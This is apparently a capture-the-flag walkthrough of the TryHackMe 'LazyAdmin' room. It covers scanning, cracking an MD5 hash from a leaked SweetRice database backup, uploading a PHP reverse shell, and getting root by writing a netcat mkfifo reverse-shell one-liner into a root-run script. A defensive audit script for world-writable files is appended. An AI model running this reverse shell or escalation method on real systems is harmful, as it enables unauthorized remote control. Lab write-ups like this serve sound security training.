TryHackMe | LazyAdmin
Run nmap
Apache server on port 80. Walk the website.
Nothing in the usual spaces (robots.txt, etc.).
Run directory scanning
Let’s check out content.
“SweetRice” shows up. Subdomains show a login page.
Another subdomain shows a directory listing.
My_sql-bakup looks interesting
Download and view. I noticed some possible credentials.
Turns out this is an MD5 hash. We have a password.
Let’s log in.
We may possibly be able to upload a reverse shell. The Ads section looks promising. Copy/paste the PHP reverse shell from Pentestmonkey.
Set up listener
Activate shell
Have a reverse shell. Upgrade the shell and search for elevated privileges.
Edit the copy.sh file. Use this code to create a listener for a bind shell:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1|nc 10.10.28.188 1234 >/tmp/f" > /etc/copy.sh
I have to redo my shell. We can run the new backup file and get a root shell
Search for flags
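
A defender-side check for the weakness the last steps rely on, as an added example that is not part of the original walkthrough: it flags world-writable files that a privileged script references by absolute path. It assumes, as the walkthrough implies, that the backup file runs with elevated privileges and calls /etc/copy.sh; the function names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the walkthrough): list files that a privileged
# script references by absolute path and that any user can modify.
# Limitation: paths containing spaces or shell variables are not resolved.

# writable_by_others PATH -> exit 0 if PATH is a regular file with the
# world-write bit set. Symlinks are followed so the target is checked.
writable_by_others() {
    [ -f "$1" ] && [ -n "$(find -L "$1" -prune -type f -perm -0002 2>/dev/null)" ]
}

# audit_script SCRIPT -> prints one "WRITABLE <path>" line for the script
# itself and for each referenced file that is world-writable.
# Returns 1 when anything was flagged, 0 when nothing was.
audit_script() {
    script=$1
    flagged=0
    # Check the script, then every absolute path that appears in its text.
    for p in "$script" $(grep -oE '/[A-Za-z0-9_./-]+' "$script" | sort -u); do
        if writable_by_others "$p"; then
            echo "WRITABLE $p"
            flagged=1
        fi
    done
    return "$flagged"
}

# Stand-alone use: pass the script that runs with elevated privileges.
if [ "$#" -gt 0 ]; then
    audit_script "$1"
fi
```

Any flagged file should be owned by root with mode 755 or tighter, or the privileged script should stop calling it.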